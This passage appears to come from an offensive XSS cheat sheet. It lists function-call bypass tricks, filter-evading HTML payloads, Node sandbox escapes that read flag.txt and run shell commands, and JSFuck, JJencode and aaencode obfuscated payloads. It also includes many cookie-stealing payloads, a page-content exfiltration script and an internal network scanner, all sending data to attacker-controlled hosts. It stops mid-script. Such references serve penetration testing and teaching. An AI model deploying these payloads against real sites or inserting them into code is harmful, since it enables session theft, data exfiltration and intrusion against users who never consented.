// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead

// Using Reflect.apply to call any function with any arguments
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call ("alert"), then the "this" value to that function ("window") which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument ("location"), a property in the second argument and a value to assign in the third.

// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the object is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''

// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}

// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The "has instance" symbol allows you to customise the behaviour of the instanceof operator: if you set this symbol it will pass the left operand to the function defined by the symbol.
```

Arbitrary function (alert) call

```javascript
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')

//General function executions
`` //Can be used as parenthesis
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
```

DOM vulnerabilities

There is JS code that uses, in an unsafe way, data controlled by the attacker such as location.href. An attacker could abuse this to execute arbitrary JS.
Because the explanation of DOM vulnerabilities grew too long, it was moved to this page:

DOM XSS

There you will find a detailed explanation of what DOM vulnerabilities are, how they are triggered, and how to exploit them.
Also, don't forget that at the end of the mentioned post you will find an explanation of DOM Clobbering attacks.

Upgrading Self-XSS

If you can trigger an XSS by sending the payload inside a cookie, this is usually a self-XSS. However, if you find a subdomain vulnerable to XSS, you can abuse that XSS to set a cookie for the whole domain and trigger the cookie XSS on the main domain or on other subdomains (those vulnerable to the cookie XSS). For this you can use the cookie tossing attack:

Cookie Tossing

You can find a great abuse of this technique in this blog post.

Sending your session to the admin

Maybe a user can share their profile with the admin, and if the self XSS is inside the user's profile and the admin accesses it, they will trigger the vulnerability.

Session mirroring

If you find a self XSS and the web page has session mirroring for administrators, for example allowing customers to ask for help and, in order to help you, the admin sees what you see in your session but from their own session.

You could make the administrator trigger your self XSS and steal their cookies/session.

Other bypasses

Sanitization bypass via WASM linear-memory template overwrite

When a web app uses Emscripten/WASM, constant strings (such as HTML format stubs) live in writable linear memory. A single overflow inside WASM (for example, an unchecked memcpy on the edit path) can corrupt neighbouring structures and redirect writes onto those constants. Overwriting a template such as "%.*s" to "" turns the sanitized input into a JavaScript handler value and triggers DOM XSS immediately at render time.

Check the dedicated page with the exploitation flow, DevTools memory helpers, and defensive techniques:

Wasm Linear Memory Template Overwrite Xss

Normalised Unicode

You can check whether the reflected values are being unicode normalized on the server side (or on the client side) and abuse this behaviour to bypass protections. Find an example here.

PHP FILTER_VALIDATE_EMAIL flag Bypass

javascript
"><svg/onload=confirm(1)>"@x.y

Ruby-On-Rails bypass

Due to RoR mass assignment, quotes are inserted into the HTML, so the quote restriction is bypassed and additional fields (onfocus) can be added inside the tag.
Form example (from this report), if you send the payload:

contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa

The pair "Key","Value" will be output like this:

{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}

Then, the onfocus attribute will be inserted and the XSS occurs.

Special combinations

html
<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1'&#41</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)

XSS with header injection in a 302 response

If you find that you can inject headers in a 302 Redirect response, you can try to make the browser execute arbitrary JavaScript. This is not as easy as it sounds, because modern browsers do not interpret the HTTP response body if the HTTP response status code is 302, so a plain cross-site scripting payload is useless.

In this report and this one you can read how to test several protocols inside the Location header and see whether any of them lets the browser inspect and execute the XSS payload inside the body.
Past known protocols: mailto://, //x:1/, ws://, wss://, empty Location header, resource://.

Only Letters, Numbers and Dots

If all you can control is the name of the callback that the JavaScript is going to execute, limited to those characters, read this section of this post to find out how to abuse this behaviour.

Valid <script> Content-Types for XSS

(From here) If you try to load a script with a content-type such as application/octet-stream, Chrome will throw the following error:

Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx' because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.

The only Content-Types that Chrome will accept for a loaded script are the ones inside the const kSupportedJavascriptTypes from https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc

c
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};

Script Types for XSS

(From here) So, which types can be specified to load a script?

html
<script type="???"></script>

The answer is:

  • module (default, nothing to explain)
  • webbundle: Web Bundles is a feature that lets you package a set of data (HTML, CSS, JS…) together in a .wbn file.
html
<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP
  • importmap: Allows improving the import syntax
html
<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>

<!-- With importmap you can do the following -->
<script>
import moment from "moment"
import { partition } from "lodash"
</script>

This behaviour was used in this writeup to remap a library to eval in order to abuse it; it can trigger XSS.

  • speculationrules: This feature is mainly intended to solve some problems caused by pre-rendering. It works like this:
html
<script type="speculationrules">
{
"prerender": [
{ "source": "list", "urls": ["/page/2"], "score": 0.5 },
{
"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1
}
]
}
</script>

Web Content-Types for XSS

(From here) The following Content-Types can execute XSS in all browsers:

  • text/html
  • application/xhtml+xml
  • application/xml
  • text/xml
  • image/svg+xml
  • text/plain (?? not in the list but I think I saw this in a CTF)
  • application/rss+xml (off)
  • application/atom+xml (off)

In other browsers other Content-Types can be used to execute arbitrary JS, check: https://github.com/BlackFan/content-type-research/blob/master/XSS.md

xml Content Type

If the page returns a text/xml content-type, it is possible to indicate a namespace and execute arbitrary JS:

xml
<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>

<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->

Special Replacement Patterns

When something like "some {{template}} data".replace("{{template}}", <user_input>) is used, the attacker can use special string replacements to try to bypass some protections: "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))

For example, in this writeup this was used to escape a JSON string inside a script and execute arbitrary code.
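The mechanism described above, as an added example that is not code from the original page: a replacement string is subject to $-pattern expansion, so `$'` copies the template's own suffix (here the closing quote) into the inserted value, while a replacer function inserts the value verbatim. The template, the `escapeForJsString` helper and the probe value are constructed for this example.

```javascript
// Constructed server-side template that embeds a user value in a JS string literal.
const TEMPLATE = 'var cfg = {"name": "{{name}}"};';

// Naive escaping of quotes, backslashes and newlines so the value cannot
// terminate the string literal by itself. It does not touch "$".
function escapeForJsString(s) {
  return s
    .replace(/\\/g, "\\\\")
    .replace(/"/g, '\\"')
    .replace(/\n/g, "\\n");
}

// Vulnerable: the replacement is a plain string, so $' (text after the match),
// $` (text before the match) and $& (the match itself) are expanded. With $'
// the value receives a copy of the template's closing `"};`, which ends the
// literal and leaves whatever follows as executable code.
function renderUnsafe(userValue) {
  return TEMPLATE.replace("{{name}}", escapeForJsString(userValue));
}

// Hardened: the return value of a replacer function is inserted verbatim,
// no pattern expansion takes place. (Escaping "$" as "$$" also works but is
// easy to forget in every call site.)
function renderSafe(userValue) {
  return TEMPLATE.replace("{{name}}", () => escapeForJsString(userValue));
}

// Detection aid: true when a value carries a replacement pattern
// ($$, $&, $`, $', $n or $<name>), useful for logging on the server side.
function hasReplacementPattern(s) {
  return /\$(?:[$&`']|\d{1,2}|<[^>]*>)/.test(s);
}

const probe = "$'alert(1)//";
console.log(renderUnsafe(probe)); // var cfg = {"name": ""};alert(1)//"};  (literal closed, alert reached)
console.log(renderSafe(probe));   // var cfg = {"name": "$'alert(1)//"};  (inert)
```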

Chrome Cache to XSS

Chrome Cache to XSS

XS Jails Escape

If you only have a limited set of chars to use, check these other valid solutions for XSJail problems:

javascript
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))

// use of with
with(console)log(123)
with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))

with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))

//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()

// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE

If everything is undefined before executing untrusted code (as in this writeup), it is possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:

  • Using import()
javascript
// although import "fs" doesn't work, import('fs') does.
import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))
  • Getting require indirectly

According to this, modules are wrapped by Node.js inside a function, like this:

javascript
;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})

So, if from that module we can call another function, it is possible to use arguments.callee.caller.arguments[1] from that function to access require:

javascript
;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
"/flag.txt",
"utf8"
)
})()

In a similar way to the previous example, it is possible to use error handlers to access the module wrapper and get the require function:

javascript
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = "".constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) =>
structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arguments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log("=".repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req("child_process").execSync("id").toString())
}
}
}
trigger()

Obfuscation & Advanced Bypass

javascript
//Katana
<script>
([,ウ,,,,ア]=[]+{}
,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
</script>
javascript
//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
javascript
//JSFuck
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]
+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>
javascript
//aaencode
゚ω゚ノ = /`m´)ノ ~┻━┻   / /*´∇`*/["_"]
o = ゚ー゚ = _ = 3
c = ゚Θ゚ = ゚ー゚ - ゚ー゚
゚Д゚ = ゚Θ゚ = (o ^ _ ^ o) / (o ^ _ ^ o)
゚Д゚ = {
゚Θ゚: "_",
゚ω゚ノ: ((゚ω゚ノ == 3) + "_")[゚Θ゚],
゚ー゚ノ: (゚ω゚ノ + "_")[o ^ _ ^ (o - ゚Θ゚)],
゚Д゚ノ: ((゚ー゚ == 3) + "_")[゚ー゚],
}
゚Д゚[゚Θ゚] = ((゚ω゚ノ == 3) + "_")[c ^ _ ^ o]
゚Д゚["c"] = (゚Д゚ + "_")[゚ー゚ + ゚ー゚ - ゚Θ゚]
゚Д゚["o"] = (゚Д゚ + "_")[゚Θ゚]
゚o゚ =
゚Д゚["c"] +
゚Д゚["o"] +
(゚ω゚ノ + "_")[゚Θ゚] +
((゚ω゚ノ == 3) + "_")[゚ー゚] +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
((゚ー゚ == 3) + "_")[゚Θ゚] +
((゚ー゚ == 3) + "_")[゚ー゚ - ゚Θ゚] +
゚Д゚["c"] +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
゚Д゚["o"] +
((゚ー゚ == 3) + "_")[゚Θ゚]
゚Д゚["_"] = (o ^ _ ^ o)[゚o゚][゚o゚]
゚ε゚ =
((゚ー゚ == 3) + "_")[゚Θ゚] +
゚Д゚.゚Д゚ノ +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
((゚ー゚ == 3) + "_")[o ^ _ ^ (o - ゚Θ゚)] +
((゚ー゚ == 3) + "_")[゚Θ゚] +
(゚ω゚ノ + "_")[゚Θ゚]
゚ー゚ += ゚Θ゚
゚Д゚[゚ε゚] = "\\"
゚Д゚.゚Θ゚ノ = (゚Д゚ + ゚ー゚)[o ^ _ ^ (o - ゚Θ゚)]
o゚ー゚o = (゚ω゚ノ + "_")[c ^ _ ^ o]
゚Д゚[゚o゚] = '"'
゚Д゚["_"](
゚Д゚["_"](
゚ε゚ +
゚Д゚[゚o゚] +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(゚ー゚ + ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚ー゚ +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚ー゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚Θ゚ +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(゚ー゚ + ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
(゚ー゚ + (o ^ _ ^ o)) +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚ー゚ +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚Θ゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) - ゚Θ゚) +
(o ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(o ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
(c ^ _ ^ o) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚ー゚ +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
(゚ー゚ + ゚Θ゚) +
゚Θ゚ +
゚Д゚[゚o゚]
)(゚Θ゚)
)("_")
javascript
// It's also possible to execute JS code only with the chars: []`+!${}

Common XSS payloads

Several payloads in 1

Steal Info JS

Iframe Trap

Make the user navigate the page without leaving an iframe and steal their actions (including information sent in forms):

Iframe Traps

Get Cookies

javascript
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']='http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>

tip

You won't be able to access the cookies from JavaScript if the HTTPOnly flag is set on the cookie. But here you have some ways to bypass this protection if you are lucky enough.

Grab Page Content

javascript
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
var attacker = "http://10.10.14.8/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)

Find internal IPs

html
<script>
var q = []
var collaboratorURL =
"http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
var wait = 2000
var n_threads = 51

// Prepare the fetchUrl functions to access all the possible
for (i = 1; i <= 255; i++) {
q.push(
(function (url) {
return function () {
fetchUrl(url, wait)
}
})("http://192.168.0." + i + ":8080")
)
}

// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for (i = 1; i <= n_threads; i++) {
if (q.length) q.shift()()
}

function fetchUrl(url, wait) {
console.log(url)
var controller = new AbortController(),
signal = controller.signal
fetch(url, { signal })
.then((r) =>
r.text().then((text) => {
location =
collaboratorURL +
"?ip=" +
url.replace(/^http:\/\//, "") +
